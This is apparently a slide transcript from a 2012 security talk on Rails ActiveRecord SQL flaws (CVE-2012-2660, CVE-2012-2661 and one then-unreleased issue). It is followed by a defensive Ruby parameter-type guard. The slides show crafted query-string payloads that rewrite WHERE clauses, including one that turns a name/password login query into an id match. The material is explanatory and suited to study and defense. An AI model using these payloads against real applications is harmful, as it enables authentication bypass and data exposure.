"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Transcript
Rails Vulnerabilities Last Week
CVE-2012-2660
CVE-2012-2661

CVE-2012-2660
Allows unexpected “IS NULL” in queries
Affects Rails 2.x and 3.x

ActiveRecord Query

    unless params[:name].nil?
      @user = User.where(:name => params[:name])
    end

Query Parameters

    ?name[]            {"name"=>[nil]}

ActiveRecord Query (what actually runs)

    unless [nil].nil?
      @user = User.where(:name => [nil])
    end

Resulting SQL

    SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

CVE-2012-2661
Allows some manipulation of WHERE clause via “dotted” query keys
Affects Rails 3.x

ActiveRecord Query

    User.where(:name => params[:name])

ActiveRecord Query

    User.where("users.name" => params[:name])

Query Parameters

    ?name[users.id]=1  {"name"=>{"users.id"=>"1"}}

ActiveRecord Query (what actually runs)

    User.where(:name => {"users.id" => "1"})

Resulting SQL

    SELECT "users".* FROM "users" WHERE "users"."id" = 1

Unreleased Vulnerability (not yet published at the time of this 2012 talk)
Allows some manipulation of WHERE clause via nested hashes in query values
Affects 2.3.x and 3.x

ActiveRecord Query

    User.where(:name => params[:name], :password => params[:password])

Query Parameters

    ?name[users][id]=1&password[users][id]=1
    {"name"=>{"users"=>{"id"=>"1"}}, "password"=>{"users"=>{"id"=>"1"}}}

ActiveRecord Query (what actually runs)

    User.where(:name => {"users"=>{"id"=>"1"}}, :password => {"users"=>{"id"=>"1"}})

Resulting SQL

    SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."id" = 1
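The common thread in all three slides is that the query string is parsed into an Array or a nested Hash, and the application hands that structure straight to where(). The following is an added example, not code from the deck or from Rails: a minimal, constructed model of Rack-style nested query parsing (so the three parameter shapes above can be reproduced offline) and a scalar_param guard that refuses anything but a String before it can reach a condition hash.

```ruby
require 'uri'

# Constructed model of Rack-style nested query parsing, limited to the
# key shapes the deck shows: "k", "k[]", "k[sub]" and "k[a][b]".
# It is NOT Rack's own implementation, only enough to reproduce the
# {"name"=>[nil]} and nested-hash values from the slides.
def parse_nested_query(qs)
  params = {}
  qs.split('&').each do |pair|
    key, value = pair.split('=', 2)           # value is nil for "name[]"
    key = URI.decode_www_form_component(key)
    value = URI.decode_www_form_component(value) if value
    name, *subkeys = key.scan(/[^\[\]]+|\[\]/) # "name[users][id]" -> ["name","users","id"]
    if subkeys.empty?
      params[name] = value                     # plain scalar parameter
    elsif subkeys == ['[]']
      (params[name] ||= []) << value           # "name[]" pushes onto an Array
    else
      node = (params[name] ||= {})             # bracketed keys build nested Hashes
      subkeys[0..-2].each { |s| node = (node[s] ||= {}) }
      node[subkeys.last] = value
    end
  end
  params
end

# Defensive check for the application side: only a String (or an absent
# parameter) may be used as a where() value. Arrays and Hashes are exactly
# the shapes that became "IS NULL" and table.column lookups on the slides,
# so they are rejected instead of being forwarded to ActiveRecord.
def scalar_param(params, key)
  value = params[key]
  return value if value.nil? || value.is_a?(String)
  raise ArgumentError, "param #{key.inspect} must be a scalar, got #{value.class}"
end

if __FILE__ == $0
  %w[name[] name[users.id]=1 name[users][id]=1&password[users][id]=1].each do |qs|
    params = parse_nested_query(qs)
    puts "#{qs.ljust(42)} -> #{params.inspect}"
    begin
      scalar_param(params, 'name')
    rescue ArgumentError => e
      puts "  rejected: #{e.message}"
    end
  end
end
```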